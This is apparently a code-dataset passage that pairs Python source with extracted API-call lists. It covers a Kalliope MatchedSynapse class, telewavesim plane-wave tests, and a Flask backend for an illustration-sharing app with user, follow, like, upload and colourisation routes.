'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (9399, 9401), False, 'import traceback\n'), ((9876, 9897), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (9895, 9897), False, 'import traceback\n'), ((11754, 11778), 'os.path.exists', 'os.path.exists', (['out_path'], {}), '(out_path)\n', (11768, 11778), False, 'import os\n'), ((11787, 11811), 'os.path.exists', 'os.path.exists', (['err_path'], {}), '(err_path)\n', (11801, 11811), False, 'import os\n')]
|
import copy
from kalliope.core.NeuronParameterLoader import NeuronParameterLoader
class MatchedSynapse(object):
"""
This class represent a synapse that has matched an order send by an User.
"""
def __init__(self, matched_synapse=None, matched_order=None, user_order=None):
"""
:param matched_synapse: The synapse that has matched in the brain.
:param matched_order: The order from the synapse that have matched.
:param user_order: The order said by the user.
"""
# create a copy of the synapse. the received synapse come from the brain.
self.synapse = matched_synapse
# create a fifo list that contains all neurons to process.
# Create a copy to be sure when we remove a neuron from this list it will not be removed from the synapse's
# neuron list
self.neuron_fifo_list = copy.deepcopy(self.synapse.neurons)
self.matched_order = matched_order
self.parameters = dict()
if matched_order is not None:
self.parameters = NeuronParameterLoader.get_parameters(synapse_order=self.matched_order,
user_order=user_order)
# list of Neuron Module
self.neuron_module_list = list()
def __str__(self):
return str(self.serialize())
def serialize(self):
"""
This method allows to serialize in a proper way this object
:return: A dict of name and parameters
:rtype: Dict
"""
return {
'synapse_name': self.synapse.name,
'matched_order': self.matched_order,
'neuron_module_list': [e.serialize() for e in self.neuron_module_list]
}
def __eq__(self, other):
"""
This is used to compare 2 objects
:param other:
:return:
"""
return self.__dict__ == other.__dict__
|
[
"kalliope.core.NeuronParameterLoader.NeuronParameterLoader.get_parameters",
"copy.deepcopy"
] |
[((882, 917), 'copy.deepcopy', 'copy.deepcopy', (['self.synapse.neurons'], {}), '(self.synapse.neurons)\n', (895, 917), False, 'import copy\n'), ((1062, 1159), 'kalliope.core.NeuronParameterLoader.NeuronParameterLoader.get_parameters', 'NeuronParameterLoader.get_parameters', ([], {'synapse_order': 'self.matched_order', 'user_order': 'user_order'}), '(synapse_order=self.matched_order,\n user_order=user_order)\n', (1098, 1159), False, 'from kalliope.core.NeuronParameterLoader import NeuronParameterLoader\n')]
|
from telewavesim import utils as ut
from telewavesim.rmat_f import plane as pw_f
from telewavesim import conf as cf
import numpy as np
import pyfftw
from conftest import load_params
def test_plane_obs(load_params):
yx, yy, yz = pw_f.plane_obs(cf.nt, cf.nlay, np.array(cf.wvtype, dtype='c'))
ux = np.real(pyfftw.interfaces.numpy_fft.fft(yx))
uy = np.real(pyfftw.interfaces.numpy_fft.fft(yy))
uz = np.real(pyfftw.interfaces.numpy_fft.fft(yz))
# seismogram should be maximized on vertical component
assert np.max(np.abs(uz)) > np.max(np.abs(ux)) > np.max(np.abs(uy)), \
'Failed! Energy is not maximized on vertical component'
# tangential component should all be close to zero
assert np.allclose(uy, np.zeros(len(uy))), 'non-zero values in uy'
def test_plane_land(load_params):
yx, yy, yz = pw_f.plane_land(cf.nt, cf.nlay, np.array(cf.wvtype, dtype='c'))
ux = np.real(pyfftw.interfaces.numpy_fft.fft(yx))
uy = np.real(pyfftw.interfaces.numpy_fft.fft(yy))
uz = np.real(pyfftw.interfaces.numpy_fft.fft(yz))
# seismogram should be maximized on vertical component
assert np.max(np.abs(uz)) > np.max(np.abs(ux)) > np.max(np.abs(uy)), \
'Failed! Energy is not maximized on vertical component'
# tangential component should all be close to zero
assert np.allclose(uy, np.zeros(len(uy))), 'non-zero values in uy'
trxyz = ut.get_trxyz(ux, uy, uz)
tfs = ut.tf_from_xyz(trxyz)
nt = tfs[0].stats.npts
# zero-lag should be maximized on radial component
assert tfs[0].data[int(nt/2)] > tfs[1].data[int(nt/2)], \
'Failed! Zero-lag is not maximized on radial component'
|
[
"numpy.abs",
"telewavesim.utils.get_trxyz",
"pyfftw.interfaces.numpy_fft.fft",
"telewavesim.utils.tf_from_xyz",
"numpy.array"
] |
[((1404, 1428), 'telewavesim.utils.get_trxyz', 'ut.get_trxyz', (['ux', 'uy', 'uz'], {}), '(ux, uy, uz)\n', (1416, 1428), True, 'from telewavesim import utils as ut\n'), ((1439, 1460), 'telewavesim.utils.tf_from_xyz', 'ut.tf_from_xyz', (['trxyz'], {}), '(trxyz)\n', (1453, 1460), True, 'from telewavesim import utils as ut\n'), ((266, 296), 'numpy.array', 'np.array', (['cf.wvtype'], {'dtype': '"""c"""'}), "(cf.wvtype, dtype='c')\n", (274, 296), True, 'import numpy as np\n'), ((315, 350), 'pyfftw.interfaces.numpy_fft.fft', 'pyfftw.interfaces.numpy_fft.fft', (['yx'], {}), '(yx)\n', (346, 350), False, 'import pyfftw\n'), ((369, 404), 'pyfftw.interfaces.numpy_fft.fft', 'pyfftw.interfaces.numpy_fft.fft', (['yy'], {}), '(yy)\n', (400, 404), False, 'import pyfftw\n'), ((423, 458), 'pyfftw.interfaces.numpy_fft.fft', 'pyfftw.interfaces.numpy_fft.fft', (['yz'], {}), '(yz)\n', (454, 458), False, 'import pyfftw\n'), ((871, 901), 'numpy.array', 'np.array', (['cf.wvtype'], {'dtype': '"""c"""'}), "(cf.wvtype, dtype='c')\n", (879, 901), True, 'import numpy as np\n'), ((920, 955), 'pyfftw.interfaces.numpy_fft.fft', 'pyfftw.interfaces.numpy_fft.fft', (['yx'], {}), '(yx)\n', (951, 955), False, 'import pyfftw\n'), ((974, 1009), 'pyfftw.interfaces.numpy_fft.fft', 'pyfftw.interfaces.numpy_fft.fft', (['yy'], {}), '(yy)\n', (1005, 1009), False, 'import pyfftw\n'), ((1028, 1063), 'pyfftw.interfaces.numpy_fft.fft', 'pyfftw.interfaces.numpy_fft.fft', (['yz'], {}), '(yz)\n', (1059, 1063), False, 'import pyfftw\n'), ((538, 548), 'numpy.abs', 'np.abs', (['uz'], {}), '(uz)\n', (544, 548), True, 'import numpy as np\n'), ((559, 569), 'numpy.abs', 'np.abs', (['ux'], {}), '(ux)\n', (565, 569), True, 'import numpy as np\n'), ((580, 590), 'numpy.abs', 'np.abs', (['uy'], {}), '(uy)\n', (586, 590), True, 'import numpy as np\n'), ((1143, 1153), 'numpy.abs', 'np.abs', (['uz'], {}), '(uz)\n', (1149, 1153), True, 'import numpy as np\n'), ((1164, 1174), 'numpy.abs', 'np.abs', (['ux'], {}), '(ux)\n', (1170, 1174), True, 'import numpy as np\n'), ((1185, 1195), 'numpy.abs', 'np.abs', (['uy'], {}), '(uy)\n', (1191, 1195), True, 'import numpy as np\n')]
|
import base64
import os
import re
import random
import threading
import cv2
import numpy as np
from flask import *
from auth.Auth import Auth
from dao.FollowDAO import FollowDAO
from dao.FollowerDAO import FollowerDAO
from dao.FollowingDAO import FollowingDAO
from dao.ImageDAO import WorkDAO
from dao.InformationDAO import InformationDAO
from dao.UserDAO import UserDAO
from dao.addressDAO import AddressDAO
from pojo.Image import Work
from pojo.Information import Information
from pojo.User import User
from operation.tricks import *
from operation.ai import *
from Result import *
from pojo.address import Address
app = Flask(__name__)
# 登录账户
# 已修改
@app.route('/user/login', methods=['POST'])
def login():
data = request.get_json()
if 'phone' not in data or 'password' not in data:
return "信息缺失"
phone = data['phone']
password = data['password']
# 判断电话号码是否为空
if phone is None:
return "The phone number is empty!"
# 判断密码是否为空
if password is None:
return "The password is empty!"
user = User()
user.set_phone(phone)
user.set_password(password)
try:
user = UserDAO().retrieve(user)
except:
return "Server Failure!"
# 用户不存在
if user is None:
result = return_status(-1)
return jsonify(result)
# 授权
result = Auth.authorize(user)
return jsonify(result)
# 注册账户
# 已修改
@app.route('/user/register', methods=['POST'])
def register():
data = request.get_json()
if 'phone' not in data or 'password' not in data:
return "信息缺失"
phone = data['phone']
password = data['password']
# 判断电话号码是否为空
if phone is None:
return "The phone number is empty!"
# 判断密码是否为空
if password is None:
return "The password is empty!"
# 检测手机是否已经使用
phone_is_used = verify_phone(phone)
if phone_is_used:
result = return_status(-1) # 手机号码被使用
return jsonify(result)
# 检测手机格式是否正确
phone_format_false = verify_phone_format(phone)
if phone_format_false:
result = return_status(-2) # 手机格式不正确
return jsonify(result)
user = User()
user.set_phone(phone)
user.set_password(password)
try:
user_dao = UserDAO()
user_dao.add(user)
result = return_status(0)
return jsonify(result) # 注册成功
except:
return "Server failure!"
# 验证电话号码
def verify_phone(phone):
return False
# 验证手机格式
def verify_phone_format(phone):
return False
# 退出账号
@app.route('/user/logout', methods=['GET'])
def logout():
result = return_status(0)
return jsonify(result)
# 获取个人信息
# 已修改
@app.route('/user/profile', methods=['GET'])
def getInformation():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
user_id = request.args.get('userid')
information = Information()
if user_id is None:
# user_id空取JWT中id
information.set_user_id(auth_user_id)
else:
# user_id不为空取user_id
information.set_user_id(user_id)
try:
information = InformationDAO().retrieve(information)
if information is None:
# 用户不存在
result = return_status(-1)
return jsonify(result)
else:
# 返回用户信息
result = return_Information(0, information)
return jsonify(result)
except:
result = return_status(-2)
return jsonify(result)
# 修改个人信息
# 已修改
@app.route('/user/profile', methods=['POST'])
def modifyInformation():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
# 获取用户
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
# 用户不存在
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
information = Information()
information.set_user_id(auth_user_id)
data = request.get_json()
if 'NickName' not in data:
return "上传的信息不完整"
nick_name = data['NickName']
nick_name = str(nick_name)
information.set_nick_name(nick_name)
if 'Avatar' not in data:
return "上传的信息不完整"
avatar = data['Avatar']
avatar = str(avatar)
information.set_avatar(avatar)
if 'Signature' not in data:
return "上传的信息不完整"
signature = data['Signature']
signature = str(signature)
information.set_signature(signature)
if 'BackgroundPhoto' not in data:
return "上传的信息不完整"
background_photo = data['BackgroundPhoto']
background_photo = str(background_photo)
information.set_background_photo(background_photo)
information_dao = InformationDAO()
result = information_dao.update(information)
result = return_status(result)
return jsonify(result)
# 创建文件夹
def mkdir(folder_path):
folder = os.path.exists(folder_path)
if not folder:
os.makedirs(folder_path)
return folder_path
# 上传头像
@app.route('/user/avatar', methods=['POST'])
def upload_avatar():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
# 获取用户
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
# 用户不存在
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
# 设置路径
folder_path = 'avatar/' + str(auth_user_id)
mkdir(folder_path)
information = Information()
information.set_user_id(auth_user_id)
path = folder_path + '/avatar.jpg'
information.set_avatar(path)
# 读取头像图片
try:
avatar = request.get_data()
if avatar is None:
return "上传的图片为空"
with open(path, 'wb') as f:
f.write(avatar)
except:
result = return_status(-2)
return jsonify(result)
# 数据库修改
information_dao = InformationDAO()
try:
result = information_dao.update_avatar(information)
if result is not None:
result = return_homepage(result, path)
return jsonify(result)
else:
result = return_status(-2)
return jsonify(result)
except:
result = return_status(-2)
return jsonify(result)
# 上传个人主页图
@app.route('/user/homepage', methods=['POST'])
def upload_homepage():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
# 获取用户
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
# 用户不存在
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
# 设置路径
folder_path = 'background/' + str(auth_user_id)
mkdir(folder_path)
information = Information()
path = folder_path + '/background.jpg'
information.set_user_id(auth_user_id)
information.set_background_photo(path)
# 读取背景图片
try:
homepage = request.get_data()
if homepage is None:
return "上传的图片为空"
with open(path, 'wb') as f:
f.write(homepage)
except:
result = return_status(-2)
return jsonify(result)
# 数据库修改
information_dao = InformationDAO()
try:
result = information_dao.update_background_photo(information)
if result is not None:
result = return_homepage(result, path)
return jsonify(result)
else:
result = return_status(-2)
return jsonify(result)
except:
result = return_status(-2)
return jsonify(result)
# 获取我关注的列表
@app.route('/user/following', methods=['GET'])
def following():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
# 获取用户
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
# 用户不存在
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
following_dao = FollowingDAO()
try:
followings = following_dao.retrieve(retrieve_user.get_user_id())
results = return_following(followings)
return jsonify(results)
except:
result = return_status(-2)
return jsonify(result)
# 点击/取消关注
@app.route('/user/follow', methods=['POST'])
def follow():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
# 获取用户
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
# 用户不存在
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
data = request.get_json()
if 'UserID' not in data or 'Cancel' not in data:
return "信息缺失"
user_id = data['UserID']
cancel_follow = data['Cancel']
follow_dao = FollowDAO()
if cancel_follow == 'True' or cancel_follow == 'true' or cancel_follow is True:
follow_dao.delete(user_id, auth_user_id)
result = return_status(1)
return jsonify(result)
if cancel_follow == 'False' or cancel_follow == 'false' or cancel_follow is False:
follow_dao.add(user_id, auth_user_id)
result = return_status(0)
return jsonify(result)
else:
result = return_status(-1)
return jsonify(result)
# 获取关注我的列表
@app.route('/user/follower', methods=['GET'])
def follower():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
# 获取用户
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
# 用户不存在
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
follower_dao = FollowerDAO()
try:
followers = follower_dao.retrieve(retrieve_user.get_user_id())
results = return_follower(followers)
return jsonify(results)
except:
result = return_status(-2)
return jsonify(result)
# 获取11位随机数
def get_work_id():
return random.randint(10000000000, 99999999999)
# 获取个人作品
@app.route('/illustration/mywork', methods=['GET'])
def get_myworks():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
user_id = request.args.get('userid')
if user_id is None:
return "信息不完整"
# 获取用户
user = User()
user.set_user_id(user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
# 用户不存在
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
type = request.args.get('type')
if type is None:
return "信息不完整"
type = str(type)
top = request.args.get('top')
if top is None:
return "信息不完整"
top = str(top)
work_dao = WorkDAO()
works = work_dao.retrieve(user_id)
if type == 'home':
if top is 'true' or top is 'True':
pass
else:
result = return_home(works)
return jsonify(result)
if type == 'detail':
if top is 'true' or top is 'True':
pass
else:
result = return_detail(works)
return jsonify(result)
else:
return "信息不正确"
# 获取作品图片
@app.route('/illustration/image', methods=['GET'])
def get_image():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
# 获取用户
# user = User()
# user.set_user_id(auth_user_id)
# user_dao = UserDAO()
# try:
# retrieve_user = user_dao.retrieve(user)
# except:
# result = return_status(-2)
# return jsonify(result)
# 用户不存在
# if retrieve_user is None:
# result = return_status(-1)
# return jsonify(result)
id = request.args.get('id')
if id is None:
return "信息不完整"
id = int(id)
size = request.args.get('size')
if size is None:
size = None
else:
size = str(size)
type = request.args.get('type')
if type is None:
type = None
else:
type = str(type)
print(type)
print(size)
path = WorkDAO().retrieve_address(id)
if size == 'mid':
if type == 'sketch':
path = path + '/sketch.jpg'
else:
if type is None or type == 'sketch':
path = path + '/work.jpg'
else:
return "信息不正确"
else:
if size is None:
if type == 'sketch':
path = path + '/sketch.jpg'
else:
if type is None or type == 'sketch':
path = path + '/work.jpg'
else:
return "信息不正确"
else:
return "信息不正确"
try:
with open(path, 'rb') as f:
image = f.read()
response = Response(image, mimetype='image/jpg')
return response
except:
return "Server Failure"
# 获取收藏作品
@app.route('/illustration/mylike', methods=['GET'])
def get_mylike():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
user_id = request.args.get('userid')
if user_id is None:
return "信息不完整"
user_id = int(user_id)
# 获取用户
user = User()
user.set_user_id(user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
# 用户不存在
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
my_like_work_ids = user_dao.get_my_like(retrieve_user)
my_like_works = WorkDAO().list(my_like_work_ids)
start = request.args.get('start')
if start is None:
return "信息不完整"
start = int(start)
count = request.args.get('count')
if count is None:
return "信息不完整"
count = int(count)
type = request.args.get('type')
if type is None:
return "信息不完整"
type = str(type)
if type == 'home':
result = return_home_my_like(my_like_works, start, count)
return jsonify(result)
if type == 'detail':
result = return_detail_my_like(my_like_works, start, count)
return jsonify(result)
else:
return "信息不正确"
# 收藏作品
@app.route('/illustration/mylike', methods=['POST'])
def like():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
# 获取用户
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
# 用户不存在
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
data = request.get_json()
if 'id' not in data or 'Cancel' not in data:
return "信息缺失"
id = data['id']
cancel_like = data['Cancel']
work_dao = WorkDAO()
if cancel_like == 'True' or cancel_like == 'true' or cancel_like is True:
work_dao.delete_my_like(auth_user_id, id)
result = return_status(1)
return jsonify(result)
if cancel_like == 'False' or cancel_like == 'false' or cancel_like is False:
work_dao.add_my_like(auth_user_id, id)
result = return_status(0)
return jsonify(result)
else:
result = return_status(-1)
return jsonify(result)
# 获取作品详情
@app.route('/illustration/sketchwork', methods=['GET'])
def get_sketchwork():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
# 获取用户
# user = User()
# user.set_user_id(auth_user_id)
# user_dao = UserDAO()
# try:
# retrieve_user = user_dao.retrieve(user)
# except:
# result = return_status(-2)
# return jsonify(result)
# 用户不存在
# if retrieve_user is None:
# result = return_status(-1)
# return jsonify(result)
id = request.args.get('id')
if id is None:
return "信息不完整"
id = int(id)
work_dao = WorkDAO()
try:
work = work_dao.retrieve_information(id)
result = return_detail_work(work)
return jsonify(result)
except:
return 'Server Failure'
# 搜索作品
@app.route('/illustration/search', methods=['GET'])
def search():
keywords = request.args.get('keywords')
keywords = str(keywords)
return "search"
# 获取受欢迎的线稿
@app.route('/illustration/favorite_sketch', methods=['GET'])
def get_favorite_sketch():
return 'get_favorite_sketch'
# 获取受欢迎的上色
@app.route('/illustration/favorite_colorization', methods=['GET'])
def get_favorite_colorization():
return 'get_favorite_colorization'
# 今日推荐作品
@app.route('/illustration/todays', methods=['GET'])
def get_todays():
return "get_todays"
# 发布作品
@app.route('/illustration/upload', methods=['POST'])
def upload():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
# 获取用户
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
# 用户不存在
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
data = request.get_json()
if 'name' not in data or 'created' not in data or 'description' not in data or 'tags' not in data or 'allow_download' not in data or 'allow_sketch' not in data or 'allow_fork' not in data or 'original_image' not in data or 'colorization_image' not in data:
return '信息不完整'
work = Work()
work.set_artist(auth_user_id)
name = data['name']
name = str(name)
work.set_name(name)
created_time = data['created']
created_time = str(created_time)
work.set_created(created_time)
description = data['description']
description = str(description)
work.set_description(description)
tags = data['tags']
work.set_tags(tags)
allow_downloaded = data['allow_download']
allow_downloaded = bool(allow_downloaded)
work.set_allow_fork(allow_downloaded)
allow_sketch = data['allow_sketch']
allow_sketch = bool(allow_sketch)
work.set_allow_sketch(allow_sketch)
allow_fork = data['allow_fork']
allow_fork = bool(allow_fork)
work.set_allow_fork(allow_fork)
original_image = data['original_image']
original_image = str(original_image)
colorization_image = data['colorization_image']
colorization_image = str(colorization_image)
address = Address()
address.set_original_image(original_image)
address.set_colorization_image(colorization_image)
work_dao = WorkDAO()
try:
work_dao.add_work(work, address)
result = return_status(0)
return jsonify(result)
except:
result = return_status(-2)
return jsonify(result)
def get_request_image(image):
image = re.sub('^data:image/.+;base64,', '', image)
image = base64.urlsafe_b64decode(image)
image = np.fromstring(image, dtype=np.uint8)
image = cv2.imdecode(image, -1)
return image
# pool = []
# lock = 1
#
#
def handle_colorization(pool):
# mutex = threading.Lock()
# 锁定
# mutex.acquire(lock)
# print(len(pool))
# if len(pool) > 0:
# sketch, points, path = pool[0]
# del pool[0]
# else:
# return
# 释放
# mutex.release()
sketch, points, path = pool
improved_sketch = sketch.copy()
improved_sketch = min_resize(improved_sketch, 512)
improved_sketch = cv_denoise(improved_sketch)
improved_sketch = sensitive(improved_sketch, s=5.0)
improved_sketch = go_tail(improved_sketch)
std = cal_std(improved_sketch)
if std > 100.0:
improved_sketch = go_passline(improved_sketch)
improved_sketch = min_k_down_c(improved_sketch, 2)
improved_sketch = cv_denoise(improved_sketch)
improved_sketch = go_tail(improved_sketch)
improved_sketch = sensitive(improved_sketch, s=5.0)
improved_sketch = min_black(improved_sketch)
improved_sketch = cv2.cvtColor(improved_sketch, cv2.COLOR_BGR2GRAY)
sketch_1024 = k_resize(improved_sketch, 64)
sketch_256 = mini_norm(k_resize(min_k_down(sketch_1024, 2), 16))
sketch_128 = hard_norm(sk_resize(min_k_down(sketch_1024, 4), 32))
baby = go_baby(sketch_128, opreate_normal_hint(ini_hint(sketch_128), points, type=0, length=1))
baby = de_line(baby, sketch_128)
for _ in range(16):
baby = blur_line(baby, sketch_128)
baby = go_tail(baby)
baby = clip_15(baby)
composition = go_gird(sketch=sketch_256, latent=d_resize(baby, sketch_256.shape), hint=ini_hint(sketch_256))
composition = go_tail(composition)
painting_function = go_head
reference = None
alpha = 0
result = painting_function(
sketch=sketch_1024,
global_hint=k_resize(composition, 14),
local_hint=opreate_normal_hint(ini_hint(sketch_1024), points, type=2, length=2),
global_hint_x=k_resize(reference, 14) if reference is not None else k_resize(composition, 14),
alpha=(1 - alpha) if reference is not None else 1
)
result = go_tail(result)
cv2.imwrite(path, result)
return
# 提交上色请求
@app.route('/illustration/colorization', methods=['POST'])
def colorization():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
# 获取用户
user = User()
user.set_user_id(auth_user_id)
user_dao = UserDAO()
try:
retrieve_user = user_dao.retrieve(user)
except:
result = return_status(-2)
return jsonify(result)
# 用户不存在
if retrieve_user is None:
result = return_status(-1)
return jsonify(result)
# 获取信息
data = request.get_json()
if 'image' not in data or 'points' not in data:
return "信息不完整"
image = data['image']
points = data['points']
for _ in range(len(points)):
points[_][1] = 1 - points[_][1]
# data = datas['data']
#
# anchor = data['anchor']
# anchor_x = anchor['x']
# anchor_y = anchor['y']
# anchor_color = anchor['color']
# print(anchor_x + ' ' + anchor_y + ' ' + anchor_color)
#
# hint = data['hint']
# 处理图片
try:
image = get_request_image(image)
image = from_png_to_jpg(image)
except:
result = return_status(-1)
return jsonify(result)
# 生成图片id
id = get_work_id()
path = 'works/' + str(auth_user_id) + '/' + str(id)
path = mkdir(path)
cv2.imwrite(path + '/sketch.jpg', image)
address = Address()
address.set_work_id(id)
address.set_user_id(auth_user_id)
address.set_path(path)
original_image = str(auth_user_id) + str(id) + '0'
address.set_original_image(original_image)
colorization_image = str(auth_user_id) + str(id) + '1'
address.set_colorization_image(colorization_image)
receipt = str(id) + 'r' + str(auth_user_id)
address.set_receipt(receipt)
address_dao = AddressDAO()
address_dao.add(address)
path = path + '/result.jpg'
pool = [image, points, path]
threading.Thread(target=handle_colorization, args=(pool, )).start()
# cv2.imwrite(path, image)
result = return_receipt(0, address)
return jsonify(result)
# 查询上色请求
@app.route('/illustration/colorization', methods=['GET'])
def get_receipt():
auth = request.headers.get('Authorization')
auth_user_id = Auth.identify(auth)
# Authorization header不正确
if auth_user_id is None:
result = return_status(-2)
return jsonify(result)
receipt = request.args.get('receipt')
if receipt is None:
return '信息不完整'
receipt = str(receipt)
address = Address()
address.set_receipt(receipt)
address_dao = AddressDAO()
address = address_dao.retrieve(address)
if address is None:
result = return_status(-1)
return jsonify(result)
path = address.get_path() + '/result.jpg'
flag = os.path.exists(path)
if flag:
result = return_load(0, address)
return jsonify(result)
else:
result = return_status(1)
return jsonify(result)
# def handle_threading():
# while True:
# try:
# handle_colorization()
# except Exception as e:
# print(e)
# threading.Thread(target=handle_threading).start()
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, threaded=True)
|
[
"cv2.imdecode",
"pojo.User.User",
"pojo.Image.Work",
"auth.Auth.Auth.identify",
"random.randint",
"dao.addressDAO.AddressDAO",
"cv2.cvtColor",
"cv2.imwrite",
"os.path.exists",
"base64.urlsafe_b64decode",
"pojo.Information.Information",
"re.sub",
"numpy.fromstring",
"dao.FollowerDAO.FollowerDAO",
"threading.Thread",
"dao.FollowDAO.FollowDAO",
"dao.FollowingDAO.FollowingDAO",
"os.makedirs",
"dao.InformationDAO.InformationDAO",
"auth.Auth.Auth.authorize",
"pojo.address.Address",
"dao.UserDAO.UserDAO",
"dao.ImageDAO.WorkDAO"
] |
[((1059, 1065), 'pojo.User.User', 'User', ([], {}), '()\n', (1063, 1065), False, 'from pojo.User import User\n'), ((1342, 1362), 'auth.Auth.Auth.authorize', 'Auth.authorize', (['user'], {}), '(user)\n', (1356, 1362), False, 'from auth.Auth import Auth\n'), ((2141, 2147), 'pojo.User.User', 'User', ([], {}), '()\n', (2145, 2147), False, 'from pojo.User import User\n'), ((2778, 2797), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (2791, 2797), False, 'from auth.Auth import Auth\n'), ((2985, 2998), 'pojo.Information.Information', 'Information', ([], {}), '()\n', (2996, 2998), False, 'from pojo.Information import Information\n'), ((3740, 3759), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (3753, 3759), False, 'from auth.Auth import Auth\n'), ((3909, 3915), 'pojo.User.User', 'User', ([], {}), '()\n', (3913, 3915), False, 'from pojo.User import User\n'), ((3966, 3975), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (3973, 3975), False, 'from dao.UserDAO import UserDAO\n'), ((4239, 4252), 'pojo.Information.Information', 'Information', ([], {}), '()\n', (4250, 4252), False, 'from pojo.Information import Information\n'), ((5032, 5048), 'dao.InformationDAO.InformationDAO', 'InformationDAO', ([], {}), '()\n', (5046, 5048), False, 'from dao.InformationDAO import InformationDAO\n'), ((5207, 5234), 'os.path.exists', 'os.path.exists', (['folder_path'], {}), '(folder_path)\n', (5221, 5234), False, 'import os\n'), ((5452, 5471), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (5465, 5471), False, 'from auth.Auth import Auth\n'), ((5621, 5627), 'pojo.User.User', 'User', ([], {}), '()\n', (5625, 5627), False, 'from pojo.User import User\n'), ((5678, 5687), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (5685, 5687), False, 'from dao.UserDAO import UserDAO\n'), ((6034, 6047), 'pojo.Information.Information', 'Information', ([], {}), '()\n', (6045, 6047), False, 'from pojo.Information import Information\n'), ((6454, 6470), 'dao.InformationDAO.InformationDAO', 'InformationDAO', ([], {}), '()\n', (6468, 6470), False, 'from dao.InformationDAO import InformationDAO\n'), ((6972, 6991), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (6985, 6991), False, 'from auth.Auth import Auth\n'), ((7141, 7147), 'pojo.User.User', 'User', ([], {}), '()\n', (7145, 7147), False, 'from pojo.User import User\n'), ((7198, 7207), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (7205, 7207), False, 'from dao.UserDAO import UserDAO\n'), ((7558, 7571), 'pojo.Information.Information', 'Information', ([], {}), '()\n', (7569, 7571), False, 'from pojo.Information import Information\n'), ((7998, 8014), 'dao.InformationDAO.InformationDAO', 'InformationDAO', ([], {}), '()\n', (8012, 8014), False, 'from dao.InformationDAO import InformationDAO\n'), ((8521, 8540), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (8534, 8540), False, 'from auth.Auth import Auth\n'), ((8690, 8696), 'pojo.User.User', 'User', ([], {}), '()\n', (8694, 8696), 